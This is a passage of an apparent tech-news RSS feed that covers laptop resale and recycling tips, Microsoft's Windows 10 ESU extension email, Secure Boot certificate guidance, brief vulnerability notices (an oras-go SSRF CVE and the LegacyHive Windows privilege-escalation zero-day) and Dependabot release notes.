<p>Im besten Fall verwenden Sie auch eine leichte, desinfizierende Reinigungslösung, um auch Bakterien zu entfernen. Schließlich möchte niemand zu viele Spuren des Vorbesitzers in Kauf nehmen. Besonders löblich wäre es, wenn Sie den Laptop aufschrauben und auch von innen vorsichtig von Staub befreien – das ist aber kein Muss, wenn Sie sich das nicht zutrauen.</p>



<p><a href="https://www.pcwelt.de/article/2581644/pc-laptop-richtig-reinigen.html" target="_blank" rel="noreferrer noopener">Mehr Tipps zur Reinigung von Geräten finden Sie hier.</a></p>



<h2 class="wp-block-heading">Schritt 3: Verkaufsplattform finden</h2>



<p>Nun geht es zur Wahl der richtigen Verkaufsplattform. Je nachdem, in welchem Zustand Ihr Gerät ist und was Sie gerne dafür bekommen würden, gibt es hier unterschiedliche Möglichkeiten.</p>



<p>Dazu gehören natürlich Klassiker wie Ebay und Kleinanzeigen, aber auch neuere Plattformen wie Vinted (die Seite nimmt seit 2024 auch Elektrogeräte an). Hier hängt der erfolgreiche Verkauf natürlich davon ab, dass sich ein Interessent für das Gerät findet. Unter Umständen können Sie Ihr Notebook aber auch bei einer Refurbished-Seite wie <a href="https://www.awin1.com/cread.php?awinmid=14000&amp;awinaffid=486277&amp;clickref=rss&amp;ued=https://www.rebuy.de/">Rebuy </a>oder <a href="https://www.refurbed.de/">Refurbed </a>einschicken.</p>



<p>Einige Elektrofachhändler nehmen auch Altgeräte an und geben dafür etwa einen Rabatt beim Kauf eines neuen Geräts. Oder Sie können nachsehen, ob der Hersteller Ihres Laptops auch Altgeräte annimmt.</p>



<p><strong>Wichtig: </strong>Geben Sie immer die genaue Modellbezeichnung, den Herstellernamen und das Alter des Geräts an. Außerdem sollten Sie dazuschreiben, welche CPU und GPU verbaut sind, wie viel Arbeitsspeicher vorhanden ist und welche Auflösung das Display hat. Alle wichtigen Daten finden Sie in den <strong>Systeminformationen</strong>.</p>



<h2 class="wp-block-heading">Schritt 4: Richtig recyceln</h2>



<p>Wenn alle Stricke reißen und Ihr Gerät entweder so kaputt ist, dass nichts zu retten ist, oder Sie es einfach nicht verkauft bekommen, dann hilft nur noch der Gang zum Wertstoffhof. Das ist der einzige Ort, an dem Sie Laptops und andere elektronische Geräte <strong>sicher und legal</strong> entsorgen können.</p>



<p>Laptops gehören niemals in den Hausmüll, denn die darin befindlichen Akkus können noch Restladung enthalten und beispielsweise Brände auslösen. Außerdem sind die enthaltenen Rohstoffe wertvoll und sollten nicht einfach im Müll landen.</p>



<p>Ihr lokaler Wertstoffhof wird elektrische Geräte sicher dankend annehmen und dabei helfen, Laptops richtig zu recyceln. </p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading">Alternativen zum Verkauf oder Recycling</h2>



<p>Wenn Sie Ihren Laptop weder verkaufen noch recyceln möchten, dann gibt es noch andere Wege, mit einem alten Gerät umzugehen. Wenn das Gerät noch halbwegs funktioniert, können Sie es an ein jüngeres Familienmitglied weitergeben, das sich vielleicht darüber freut.</p>



<p>Auch als Zweitmonitor könnten Sie den Laptop weiterverwenden, wenn Sie bereits ein neues Gerät besitzen und keinen separaten Monitor dazu kaufen wollen. Oder Sie nutzen ihn allein zum Streamen von Filmen, Serien oder Youtube-Videos. <a href="https://www.pcwelt.de/article/2639709/nicht-wegwerfen-fuenf-geniale-ideen-fuer-alte-notebook-laptops-weiternutzung.html" target="_blank" rel="noreferrer noopener">Weitere Verwendungsmöglichkeiten für alte Laptops haben wir in diesem Artikel vorgestellt.</a></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft schickt jetzt eine Mail an Windows-10-Nutzer: Das steht drin]]></title>
<description><![CDATA[Microsoft verschickt jetzt an Windows-10-Nutzer eine Mail, in der das Unternehmen darüber informiert, dass es den Support für Windows 10 um ein weiteres Jahr verlängert. Windows 10 gehört also nicht zu den zahlreichen Programmen, die Microsoft in diesem Jahr ausmustert. Das steht in der Mail, die...]]></description>
<link>https://tsecurity.de/de/3677517/it-nachrichten/microsoft-schickt-jetzt-eine-mail-an-windows-10-nutzer-das-steht-drin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677517/it-nachrichten/microsoft-schickt-jetzt-eine-mail-an-windows-10-nutzer-das-steht-drin/</guid>
<pubDate>Sat, 18 Jul 2026 08:02:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft verschickt jetzt an Windows-10-Nutzer eine Mail, in der das Unternehmen darüber informiert, dass es den <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates-sensation.html" target="_blank" rel="noreferrer noopener">Support für Windows 10 um ein weiteres Jahr verlängert. </a>Windows 10 gehört also nicht <a href="https://www.pcwelt.de/article/3022930/microsoft-stellt-diese-windows-und-office-versionen-2026-ein.html" target="_blank" rel="noreferrer noopener">zu den zahlreichen Programmen, die Microsoft in diesem Jahr ausmustert.</a> Das steht in der Mail, die zumindest in den USA an Windows-10-Nutzer geht:</p>



<p>Die Mail beginnt mit der Überschrift “Bleiben Sie ein weiteres Jahr sicher” (in englischer Sprache). Danach erklärt Microsoft, dass die Windows 10 Extended Security Updates (ESU) bis zum 12. Oktober 2027 verlängert werden. Und somit anders als ursprünglich geplant nicht bereits am 12. Oktober 2026 auslaufen. Voraussetzung ist natürlich, <a href="https://www.pcwelt.de/article/2941599/windows-10-gratis-sicher-nutzen-esu-registrierung-so-gehts.html" target="_blank" rel="noreferrer noopener">dass Sie sich für die Windows 10 Extended Security Updates (ESU) angemeldet haben.</a></p>



<p>Wie das US-amerikanische IT-Nachrichtenportal Windowslatest <a href="https://www.windowslatest.com/2026/07/13/microsofts-new-windows-10-esu-email-doesnt-push-windows-11-just-reminds-users-of-the-year-extension/">anmerkt</a>, landet diese Mail in Outlook im “Sonstige”-Ordner und nicht im “Relevant”-Ordner. Es besteht also das Risiko, dass viele Outlook-Nutzer diese offizielle Microsoft-Mail übersehen.</p>



<h2 class="wp-block-heading">Microsoft zeigt plötzlich Verständnis</h2>



<p>Im Text der Mail erklärt Microsoft sein (plötzliches) Verständnis dafür, dass der Umzug zu einem <a href="https://www.pcwelt.de/article/2901492/5-warnsignale-dass-ihr-pc-ein-upgrade-braucht-unnoetige-kosten-vermeiden.html" target="_blank" rel="noreferrer noopener">neuen PC </a>oder einem<a href="https://www.pcwelt.de/article/2945534/neues-notebook-diese-10-schritte-sollten-sie-sofort-erledigen.html" target="_blank" rel="noreferrer noopener"> neuen Notebook</a> Zeit braucht. In den vergangenen Jahren hatte es Microsoft an diesem Verständnis fehlen lassen. Immerhin sollte der Support für Windows 10 ja bereits im Oktober 2025 enden. Dann kam die erste Verlängerung bis Oktober 2026 und kürzlich die bis Oktober 2027. Vermutlich waren es die nach wie vor <a href="https://www.pcwelt.de/article/3183702/windows-11-verliert-weltweit-nutzer-schock-fur-microsoft.html" target="_blank" rel="noreferrer noopener">hohen Marktanteile von Windows 10,</a> die Microsoft so verständnisvoll werden ließen.</p>



<p>Über einen “Mehr erfahren”-Button gelangt der interessierte Nutzer zu einer Webseite mit weiteren Informationen. Dabei handelt es sich um die <a href="https://www.microsoft.com/de-de/windows/extended-security-updates" target="_blank" rel="noreferrer noopener">offizielle Info-Seite von Microsoft zu den ESU-Updates für Windows 10.</a></p>



<h2 class="wp-block-heading">Wer erhält diese Mail?</h2>



<p>Diese Mail geht laut Windowslatest nur an Nutzer, die sich bereits für das ESU-Programm für Windows 10 angemeldet haben. Wer sich aber noch nicht für das ESU-Programm angemeldet hat, erhält diese Mail nicht. Diese Mail dient also nicht dazu, überhaupt erst über das ESU-Programm zu informieren, sondern nur dazu, dass alle ESU-Nutzer von der Verlängerung um ein weiteres Jahr erfahren. Wobei man zu Microsofts Ehrenrettung sagen muss, dass es im Juli 2026 fahrlässig ist, Windows 10 ohne ESU-Updates zu verwenden: In so einem Windows-10-System wurden seit Oktober 2025 keine Lücken mehr geschlossen.</p>



<p>Sie müssen auf diese Mail in keiner Weise reagieren oder aktiv werden. Anders sieht es aus, wenn Sie Windows 10 tatsächlich noch ohne ESU-Updates nutzen sollten: <a href="https://www.pcwelt.de/article/2941599/windows-10-gratis-sicher-nutzen-esu-registrierung-so-gehts.html" target="_blank" rel="noreferrer noopener">Hier erklären wir, wie Sie sich dafür anmelden.</a> Das sollten Sie jetzt sofort machen.</p>



<p><a href="https://www.pcwelt.de/article/2958705/pc-upgrade-ssd-ram-cpu-grafikkarte.html" target="_blank" rel="noreferrer noopener">PC-Upgrade statt Neukauf: So sparen Sie Hunderte Euro</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 Secure Boot certificates have expired, and Microsoft says what to do next]]></title>
<description><![CDATA[Microsoft closed its Secure Boot Office Hours event with engineers from Microsoft, HP, Dell, and Surface answering live IT admin questions on confidence ratings, the AvailableUpdates registry key, aging firmware, and legacy hardware ahead of the next certificate deadline on October 19.
The post W...]]></description>
<link>https://tsecurity.de/de/3677313/windows-tipps/windows-11-secure-boot-certificates-have-expired-and-microsoft-says-what-to-do-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677313/windows-tipps/windows-11-secure-boot-certificates-have-expired-and-microsoft-says-what-to-do-next/</guid>
<pubDate>Sat, 18 Jul 2026 03:39:04 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft closed its Secure Boot Office Hours event with engineers from Microsoft, HP, Dell, and Surface answering live IT admin questions on confidence ratings, the AvailableUpdates registry key, aging firmware, and legacy hardware ahead of the next certificate deadline on October 19.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/07/18/windows-11-secure-boot-certificates-have-expired-and-microsoft-says-what-to-do-next/">Windows 11 Secure Boot certificates have expired, and Microsoft says what to do next</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-48978 | oras-project oras-go up to 2.6.0 Client client.go Client.Do server-side request forgery (Nessus ID 327567)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in oras-project oras-go up to 2.6.0. This issue affects the function Client.Do of the file registry/remote/auth/client.go of the component Client. The manipulation results in server-side request forgery.

This vulnerability is cataloged as...]]></description>
<link>https://tsecurity.de/de/3677149/sicherheitsluecken/cve-2026-48978-oras-project-oras-go-up-to-260-client-clientgo-clientdo-server-side-request-forgery-nessus-id-327567/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677149/sicherheitsluecken/cve-2026-48978-oras-project-oras-go-up-to-260-client-clientgo-clientdo-server-side-request-forgery-nessus-id-327567/</guid>
<pubDate>Sat, 18 Jul 2026 00:24:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/oras-project:oras-go">oras-project oras-go up to 2.6.0</a>. This issue affects the function <code>Client.Do</code> of the file <em>registry/remote/auth/client.go</em> of the component <em>Client</em>. The manipulation results in server-side request forgery.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-48978">CVE-2026-48978</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[New Windows LegacyHive 0-Day Vulnerability Allows Hackers to Gain Admin Access]]></title>
<description><![CDATA[A Windows zero-day vulnerability, dubbed LegacyHive (MSNightmare), abuses the User Profile Service to enable local privilege escalation, tampering with administrator accounts, and admin-level code execution. LegacyHive targets the Windows User Profile Service (ProfSvc), which is responsible for l...]]></description>
<link>https://tsecurity.de/de/3676208/it-security-nachrichten/new-windows-legacyhive-0-day-vulnerability-allows-hackers-to-gain-admin-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676208/it-security-nachrichten/new-windows-legacyhive-0-day-vulnerability-allows-hackers-to-gain-admin-access/</guid>
<pubDate>Fri, 17 Jul 2026 15:38:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Windows zero-day vulnerability, dubbed LegacyHive (MSNightmare), abuses the User Profile Service to enable local privilege escalation, tampering with administrator accounts, and admin-level code execution. LegacyHive targets the Windows User Profile Service (ProfSvc), which is responsible for loading and unloading user profiles and their registry hives during logon and logoff. The public proof‑of‑concept (PoC) from the […]</p>
<p>The post <a href="https://cybersecuritynews.com/windows-legacyhive-0-day-vulnerability/">New Windows LegacyHive 0-Day Vulnerability Allows Hackers to Gain Admin Access</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives]]></title>
<description><![CDATA[A newly disclosed Windows local privilege-escalation vulnerability, dubbed LegacyHive, could allow a standard user to load and modify the per-user registry classes hive of an administrator account. The proof-of-concept (PoC), published by researcher NightmareEclipse under the MSNightmare/LegacyHi...]]></description>
<link>https://tsecurity.de/de/3676157/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676157/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</guid>
<pubDate>Fri, 17 Jul 2026 15:24:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed Windows local privilege-escalation vulnerability, dubbed LegacyHive, could allow a standard user to load and modify the per-user registry classes hive of an administrator account. The proof-of-concept (PoC), published by researcher NightmareEclipse under the MSNightmare/LegacyHive GitHub repository, abuses…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/">LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives]]></title>
<description><![CDATA[A newly disclosed local privilege escalation technique allows non-administrator Windows users to tamper with an administrator’s registry hive, opening the door to code execution at the administrator’s next login. Security researcher Will Dormann detailed the flaw after examining a proof-of-concep...]]></description>
<link>https://tsecurity.de/de/3676067/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676067/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</guid>
<pubDate>Fri, 17 Jul 2026 14:39:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed local privilege escalation technique allows non-administrator Windows users to tamper with an administrator’s registry hive, opening the door to code execution at the administrator’s next login. Security researcher Will Dormann detailed the flaw after examining a proof-of-concept tool called LegacyHive, released by developer NightmareEclipse on a self-hosted Git instance. LegacyHive exploits inconsistent […]</p>
<p>The post <a href="https://cyberpress.org/legacyhive-windows-zero-day/">LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives]]></title>
<description><![CDATA[A newly disclosed Windows local privilege-escalation vulnerability, dubbed LegacyHive, could allow a standard user to load and modify the per-user registry classes hive of an administrator account. The proof-of-concept (PoC), published by researcher NightmareEclipse under the MSNightmare/LegacyHi...]]></description>
<link>https://tsecurity.de/de/3676056/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676056/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</guid>
<pubDate>Fri, 17 Jul 2026 14:39:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed Windows local privilege-escalation vulnerability, dubbed LegacyHive, could allow a standard user to load and modify the per-user registry classes hive of an administrator account. The proof-of-concept (PoC), published by researcher NightmareEclipse under the MSNightmare/LegacyHive GitHub repository, abuses Windows’ User Profile Service to mount a target user’s UsrClass.dat hive into a registry location […]</p>
<p>The post <a href="https://gbhackers.com/legacyhive-windows-zero-day/">LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.387.0]]></title>
<description><![CDATA[What's Changed

Type the gradle, swift, and pre_commit ecosystems by @JamieMagee in #15534
Default cooldown to 3 days when default-days is not specified (behind a feature flag) by @robaiken with @Copilot in #15344
Use shared base cooldown in git_submodules by @robaiken in #15537
[Update graph] Av...]]></description>
<link>https://tsecurity.de/de/3674606/it-security-tools/v03870/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674606/it-security-tools/v03870/</guid>
<pubDate>Thu, 16 Jul 2026 22:33:50 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Type the gradle, swift, and pre_commit ecosystems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4834841548" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15534" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15534/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15534">#15534</a></li>
<li>Default cooldown to 3 days when default-days is not specified (behind a feature flag) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4684952757" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15344" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15344/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15344">#15344</a></li>
<li>Use shared base cooldown in git_submodules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4837613550" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15537" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15537/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15537">#15537</a></li>
<li>[Update graph] Avoid PathDependenciesNotReachable killing the whole job by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4830807905" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15522" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15522/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15522">#15522</a></li>
<li>[Update Graph] Ensure that txt/in pairs are included properly in layers when working out references by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4884201019" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15581" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15581/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15581">#15581</a></li>
<li>build(deps): bump opentofu to 1.12.1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RinseV/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RinseV">@RinseV</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4597635124" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15231" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15231/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15231">#15231</a></li>
<li>Type the Sentry before_send processors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4879702128" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15569" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15569/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15569">#15569</a></li>
<li>Clear T.untyped from four strong updater files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4879809730" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15570" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15570/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15570">#15570</a></li>
<li>feat(opentofu): use registry API for multi-platform lockfile hashes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/diofeher/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/diofeher">@diofeher</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651320321" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15296" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15296/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15296">#15296</a></li>
<li>julia: various fixes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IanButterworth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IanButterworth">@IanButterworth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4851258737" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15549" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15549/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15549">#15549</a></li>
<li>Type git_metadata_fetcher's git responses by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4879876600" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15572" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15572/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15572">#15572</a></li>
<li>pre-commit: add regression tests for prerelease version filtering by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-HaripriyaC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-HaripriyaC">@v-HaripriyaC</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4840941300" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15542" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15542/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15542">#15542</a></li>
<li>add test ensuring duplicate PRs aren't submitted in security jobs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4887247831" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15584" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15584/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15584">#15584</a></li>
<li>Clear T.untyped from already-strong ecosystem files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4880025222" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15573" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15573/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15573">#15573</a></li>
<li>Update branch name case values to align with schema accepted values by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4896350580" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15592" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15592/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15592">#15592</a></li>
<li>julia: fix TypeError when a cooldown is configured by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IanButterworth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IanButterworth">@IanButterworth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4894957881" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15591" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15591/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15591">#15591</a></li>
<li>Fix codespell typo in updater job spec by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4900648669" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15599" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15599/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15599">#15599</a></li>
<li>Swift: SemVer-compliant version comparison and validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-HaripriyaC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-HaripriyaC">@v-HaripriyaC</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4891805578" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15589" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15589/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15589">#15589</a></li>
<li>Type git source details by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4896503633" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15593" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15593/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15593">#15593</a></li>
<li>Expose typed git source details by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4897605250" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15594" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15594/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15594">#15594</a></li>
<li>v0.387.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4904637892" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15604" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15604/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15604">#15604</a></li>
